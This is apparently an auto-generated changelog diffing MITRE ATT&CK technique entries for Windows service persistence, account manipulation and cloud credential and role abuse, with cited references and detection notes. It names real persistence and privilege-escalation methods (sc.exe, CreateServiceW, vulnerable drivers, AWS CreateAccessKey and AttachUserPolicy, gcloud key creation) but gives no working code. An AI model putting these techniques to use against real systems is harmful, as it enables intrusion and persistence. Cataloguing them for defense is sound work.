external_references[1]['description']Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.
external_references[1]['url']https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-storehttps://blog.malwarebytes.com/101/2016/01/the-windows-vaults/
external_references[2]['source_name']Microsoft Credential LockerDelpy Mimikatz Crendential Manager
external_references[2]['description']Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.
external_references[2]['url']https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDNhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
external_references[3]['source_name']passcape Windows VaultMicrosoft Credential Locker
external_references[3]['description']Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.
external_references[3]['url']https://www.passcape.com/windows_password_recovery_vault_explorerhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN
external_references[4]['source_name']Malwarebytes The Windows VaultMicrosoft Credential Manager store
external_references[4]['description']Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.
external_references[4]['url']https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store
external_references[6]['source_name']Delpy Mimikatz Crendential Managerpasscape Windows Vault
external_references[6]['description']Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.
external_references[6]['url']https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentialshttps://www.passcape.com/windows_password_recovery_vault_explorer
x_mitre_data_sources[2]Process: OS API ExecutionFile: File Access
x_mitre_data_sources[3]File: File AccessProcess: OS API Execution
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsUriel Kosayev
x_mitre_contributorsVadim Khrykov

[T1543.003] Create or Modify System Process: Windows Service

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may create or modify Windows services to repeatet1Adversaries may create or modify Windows services to repeate
>dly execute malicious payloads as part of persistence. When >dly execute malicious payloads as part of persistence. When 
>Windows boots up, it starts programs or applications called >Windows boots up, it starts programs or applications called 
>services that perform background system functions.(Citation:>services that perform background system functions.(Citation:
> TechNet Services) Windows service configuration information> TechNet Services) Windows service configuration information
>, including the file path to the service's executable or rec>, including the file path to the service's executable or rec
>overy programs/commands, is stored in the Windows Registry. >overy programs/commands, is stored in the Windows Registry. 
>Service configurations can be modified using utilities such > Adversaries may install a new service or modify an existing
>as sc.exe and [Reg](https://attack.mitre.org/software/S0075)> service to execute at startup in order to persist on a syst
>.   Adversaries may install a new service or modify an exist>em. Service configurations can be set or modified using syst
>ing service by using system utilities to interact with servi>em utilities (such as sc.exe), by directly modifying the Reg
>ces, by directly modifying the Registry, or by using custom >istry, or by interacting directly with the Windows API.   Ad
>tools to interact with the Windows API. Adversaries may conf>versaries may also use services to install and execute malic
>igure services to execute at startup in order to persist on >ious drivers. For example, after dropping a driver file (ex:
>a system.  An adversary may also incorporate [Masquerading](> `.sys`) to disk, the payload can be loaded and registered v
>https://attack.mitre.org/techniques/T1036) by using a servic>ia [Native API](https://attack.mitre.org/techniques/T1106) f
>e name from a related operating system or benign software, o>unctions such as `CreateServiceW()` (or manually via functio
>r by modifying existing services to make detection analysis >ns such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creat
>more challenging. Modifying existing services may interrupt >ing the required service Registry values (i.e. [Modify Regis
>their functionality or may enable services that are disabled>try](https://attack.mitre.org/techniques/T1112)), or by usin
> or otherwise not commonly used.   Services may be created w>g command-line utilities such as `PnPUtil.exe`.(Citation: Sy
>ith administrator privileges but are executed under SYSTEM p>mantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlay
>rivileges, so an adversary may also use a service to escalat>er February 2022)(Citation: Unit42 AcidBox June 2020) Advers
>e privileges from administrator to SYSTEM. Adversaries may a>aries may leverage these drivers as [Rootkit](https://attack
>lso directly start services through [Service Execution](http>.mitre.org/techniques/T1014)s to hide the presence of malici
>s://attack.mitre.org/techniques/T1569/002). >ous activity on a system. Adversaries may also load a signed
 > yet vulnerable driver onto a compromised machine (known as 
 >"Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Expl
 >oitation for Privilege Escalation](https://attack.mitre.org/
 >techniques/T1068).(Citation: ESET InvisiMole June 2020)(Cita
 >tion: Unit42 AcidBox June 2020)  Services may be created wit
 >h administrator privileges but are executed under SYSTEM pri
 >vileges, so an adversary may also use a service to escalate 
 >privileges. Adversaries may also directly start services thr
 >ough [Service Execution](https://attack.mitre.org/techniques
 >/T1569/002). To make detection analysis more challenging, ma
 >licious services may also incorporate [Masquerade Task or Se
 >rvice](https://attack.mitre.org/techniques/T1036/004) (ex: u
 >sing a service and/or payload name related to a legitimate O
 >S or benign software component).

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesHardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.
external_referencesHromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.
external_referencesMicrosoft. (n.d.). Services. Retrieved June 7, 2016.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-478
external_referencesCAPEC-550
external_referencesCAPEC-551
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 15:49:58.490000+00:002022-06-30 20:17:33.824000+00:00
descriptionAdversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system. An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
external_references[1]['source_name']capecMicrosoft Windows Event Forwarding FEB 2018
external_references[1]['url']https://capec.mitre.org/data/definitions/478.htmlhttps://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection
external_references[2]['source_name']capecESET InvisiMole June 2020
external_references[2]['url']https://capec.mitre.org/data/definitions/550.htmlhttps://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
external_references[3]['source_name']capecTechNet Services
external_references[3]['url']https://capec.mitre.org/data/definitions/551.htmlhttps://technet.microsoft.com/en-us/library/cc772408.aspx
external_references[4]['source_name']TechNet ServicesMicrosoft 4697 APR 2017
external_references[4]['description']Microsoft. (n.d.). Services. Retrieved June 7, 2016.Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.
external_references[4]['url']https://technet.microsoft.com/en-us/library/cc772408.aspxhttps://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697
external_references[5]['source_name']TechNet AutorunsSymantec W.32 Stuxnet Dossier
external_references[5]['description']Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.
external_references[5]['url']https://technet.microsoft.com/en-us/sysinternals/bb963902https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
external_references[6]['source_name']Microsoft 4697 APR 2017Unit42 AcidBox June 2020
external_references[6]['description']Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.
external_references[6]['url']https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697https://unit42.paloaltonetworks.com/acidbox-rare-malware/
external_references[7]['source_name']Microsoft Windows Event Forwarding FEB 2018TechNet Autoruns
external_references[7]['description']Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
external_references[7]['url']https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detectionhttps://technet.microsoft.com/en-us/sysinternals/bb963902
x_mitre_contributors[1]Travis Smith, TripwirePedro Harrison
x_mitre_contributors[2]Pedro HarrisonMayuresh Dani, Qualys
x_mitre_data_sources[0]Service: Service CreationProcess: Process Creation
x_mitre_data_sources[1]Service: Service ModificationCommand: Command Execution
x_mitre_data_sources[2]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[3]Process: OS API ExecutionService: Service Creation
x_mitre_data_sources[4]Command: Command ExecutionWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]Windows Registry: Windows Registry Key ModificationService: Service Modification
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Crowdstrike DriveSlayer February 2022', 'description': 'Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.', 'url': 'https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/478.html', 'external_id': 'CAPEC-478'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/550.html', 'external_id': 'CAPEC-550'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/551.html', 'external_id': 'CAPEC-551'}
x_mitre_contributorsWietze Beukema, @wietze
x_mitre_contributorsAkshat Pradhan, Qualys
x_mitre_data_sourcesDriver: Driver Load
Other Version Changes

[T1098] Account Manipulation

Current version: 2.4

Version changed from: 2.2 → 2.4


Old Description
New Description
t1Adversaries may manipulate accounts to maintain access to vit1Adversaries may manipulate accounts to maintain access to vi
>ctim systems. Account manipulation may consist of any action>ctim systems. Account manipulation may consist of any action
> that preserves adversary access to a compromised account, s> that preserves adversary access to a compromised account, s
>uch as modifying credentials or permission groups. These act>uch as modifying credentials or permission groups. These act
>ions could also include account activity designed to subvert>ions could also include account activity designed to subvert
> security policies, such as performing iterative password up> security policies, such as performing iterative password up
>dates to bypass password duration policies and preserve the >dates to bypass password duration policies and preserve the 
>life of compromised credentials. In order to create or manip>life of compromised credentials.   In order to create or man
>ulate accounts, the adversary must already have sufficient p>ipulate accounts, the adversary must already have sufficient
>ermissions on systems or the domain.> permissions on systems or the domain. However, account mani
 >pulation may also lead to privilege escalation where modific
 >ations grant access to additional roles, permissions, or hig
 >her-privileged [Valid Accounts](https://attack.mitre.org/tec
 >hniques/T1078).

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 18:57:04.505000+00:002022-10-18 15:50:24.811000+00:00
descriptionAdversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
external_references[1]['source_name']Microsoft User Modified EventMicrosoft Security Event 4670
external_references[1]['description']Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.
external_references[1]['url']https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670
external_references[2]['source_name']Microsoft Security Event 4670Microsoft User Modified Event
external_references[2]['description']Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019.Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017.
external_references[2]['url']https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738
x_mitre_data_sources[2]Process: Process CreationActive Directory: Active Directory Object Modification
x_mitre_data_sources[5]Active Directory: Active Directory Object ModificationProcess: Process Creation
x_mitre_detectionCollect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078)
x_mitre_version2.22.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsWojciech Lesicki
x_mitre_platformsSaaS

[T1098.001] Account Manipulation: Additional Cloud Credentials

Current version: 2.4

Version changed from: 2.2 → 2.4


Old Description
New Description
t1Adversaries may add adversary-controlled credentials to a clt1Adversaries may add adversary-controlled credentials to a cl
>oud account to maintain persistent access to victim accounts>oud account to maintain persistent access to victim accounts
> and instances within the environment.  Adversaries may add > and instances within the environment.  For example, adversa
>credentials for Service Principals and Applications in addit>ries may add credentials for Service Principals and Applicat
>ion to existing legitimate credentials in Azure AD.(Citation>ions in addition to existing legitimate credentials in Azure
>: Microsoft SolarWinds Customer Guidance)(Citation: Blue Clo> AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citat
>ud of Death)(Citation: Blue Cloud of Death Video) These cred>ion: Blue Cloud of Death)(Citation: Blue Cloud of Death Vide
>entials include both x509 keys and passwords.(Citation: Micr>o) These credentials include both x509 keys and passwords.(C
>osoft SolarWinds Customer Guidance) With sufficient permissi>itation: Microsoft SolarWinds Customer Guidance) With suffic
>ons, there are a variety of ways to add credentials includin>ient permissions, there are a variety of ways to add credent
>g the Azure Portal, Azure command line interface, and Azure >ials including the Azure Portal, Azure command line interfac
>or Az PowerShell modules.(Citation: Demystifying Azure AD Se>e, and Azure or Az PowerShell modules.(Citation: Demystifyin
>rvice Principals)  In infrastructure-as-a-service (IaaS) env>g Azure AD Service Principals)  In infrastructure-as-a-servi
>ironments, after gaining access through [Cloud Accounts](htt>ce (IaaS) environments, after gaining access through [Cloud 
>ps://attack.mitre.org/techniques/T1078/004), adversaries may>Accounts](https://attack.mitre.org/techniques/T1078/004), ad
> generate or import their own SSH keys using either the <cod>versaries may generate or import their own SSH keys using ei
>e>CreateKeyPair</code> or <code>ImportKeyPair</code> API in >ther the <code>CreateKeyPair</code> or <code>ImportKeyPair</
>AWS or the <code>gcloud compute os-login ssh-keys add</code>>code> API in AWS or the <code>gcloud compute os-login ssh-ke
> command in GCP.(Citation: GCP SSH Key Add) This allows pers>ys add</code> command in GCP.(Citation: GCP SSH Key Add) Thi
>istent access to instances within the cloud environment with>s allows persistent access to instances within the cloud env
>out further usage of the compromised cloud accounts.(Citatio>ironment without further usage of the compromised cloud acco
>n: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)>unts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind
 > the Scenes)  Adversaries may also use the <code>CreateAcces
 >sKey</code> API in AWS or the <code>gcloud iam service-accou
 >nts keys create</code> command in GCP to add access keys to 
 >an account. If the target account has different permissions 
 >from the requesting account, the adversary may also be able 
 >to escalate their privileges in the environment (i.e. [Cloud
 > Accounts](https://attack.mitre.org/techniques/T1078/004)).(
 >Citation: Rhino Security Labs AWS Privilege Escalation)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'User']
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.582000+00:002022-10-24 15:20:47.020000+00:00
descriptionAdversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)
external_references[1]['source_name']Microsoft SolarWinds Customer GuidanceExpel IO Evil in AWS
external_references[1]['description']MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.
external_references[1]['url']https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/https://expel.io/blog/finding-evil-in-aws/
external_references[2]['source_name']Blue Cloud of DeathDemystifying Azure AD Service Principals
external_references[2]['description']Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.
external_references[2]['url']https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
external_references[3]['source_name']Blue Cloud of Death VideoGCP SSH Key Add
external_references[3]['description']Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.
external_references[3]['url']https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
external_references[4]['source_name']Demystifying Azure AD Service PrincipalsBlue Cloud of Death Video
external_references[4]['description']Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.
external_references[4]['url']https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815
external_references[5]['source_name']GCP SSH Key AddBlue Cloud of Death
external_references[5]['description']Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.
external_references[5]['url']https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/addhttps://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
external_references[6]['source_name']Expel IO Evil in AWSMicrosoft SolarWinds Customer Guidance
external_references[6]['description']A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.
external_references[6]['url']https://expel.io/blog/finding-evil-in-aws/https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
x_mitre_version2.22.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'}
x_mitre_contributorsZur Ulianitzky, XM Cyber
x_mitre_contributorsAlex Soler, AttackIQ
x_mitre_platformsSaaS

[T1098.003] Account Manipulation: Additional Cloud Roles

Current version: 2.1

Version changed from: 1.0 → 2.1


Old Description
New Description
t1An adversary may add the Global Administrator role to an advt1An adversary may add additional roles or permissions to an a
>ersary-controlled account to maintain persistent access to a>dversary-controlled cloud account to maintain persistent acc
>n Office 365 tenant.(Citation: Microsoft Support O365 Add An>ess to a tenant. For example, adversaries may update IAM pol
>other Admin, October 2019)(Citation: Microsoft O365 Admin Ro>icies in cloud-based environments or add a new global admini
>les) With sufficient permissions, a compromised account can >strator in Office 365 environments.(Citation: AWS IAM Polici
>gain almost unlimited access to data and settings (including>es and Permissions)(Citation: Google Cloud IAM Policies)(Cit
> the ability to reset the passwords of other admins) via the>ation: Microsoft Support O365 Add Another Admin, October 201
> global admin role.(Citation: Microsoft O365 Admin Roles)   >9)(Citation: Microsoft O365 Admin Roles) With sufficient per
>This account modification may immediately follow [Create Acc>missions, a compromised account can gain almost unlimited ac
>ount](https://attack.mitre.org/techniques/T1136) or other ma>cess to data and settings (including the ability to reset th
>licious account activity.>e passwords of other admins).(Citation: Expel AWS Attacker) 
 >(Citation: Microsoft O365 Admin Roles)   This account modifi
 >cation may immediately follow [Create Account](https://attac
 >k.mitre.org/techniques/T1136) or other malicious account act
 >ivity. Adversaries may also modify existing [Valid Accounts]
 >(https://attack.mitre.org/techniques/T1078) that they have c
 >ompromised. This could lead to privilege escalation, particu
 >larly if the roles added allow for lateral movement to addit
 >ional accounts.  For example, in Azure AD environments, an a
 >dversary with the Application Administrator role can add [Ad
 >ditional Cloud Credentials](https://attack.mitre.org/techniq
 >ues/T1098/001) to their application's service principal. In 
 >doing so the adversary would be able to gain the service pri
 >ncipal’s roles and permissions, which may be different from 
 >those of the Application Administrator.(Citation: SpecterOps
 > Azure Privilege Escalation) Similarly, in AWS environments,
 > an adversary with appropriate permissions may be able to us
 >e the <code>CreatePolicyVersion</code> API to define a new v
 >ersion of an IAM policy or the <code>AttachUserPolicy</code>
 > API to attach an IAM policy with additional or distinct per
 >missions to a compromised user account.(Citation: Rhino Secu
 >rity Labs AWS Privilege Escalation)  Similarly, an adversary
 > with the Azure AD Global Administrator role can toggle the 
 >“Access management for Azure resources” option to gain the a
 >bility to assign privileged access to Azure subscriptions an
 >d virtual machines to Azure AD users, including themselves.(
 >Citation: Azure AD to AD) 

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 12:40:02.331000+00:002022-10-24 15:21:19.955000+00:00
nameAdd Office 365 Global Administrator RoleAdditional Cloud Roles
descriptionAn adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin 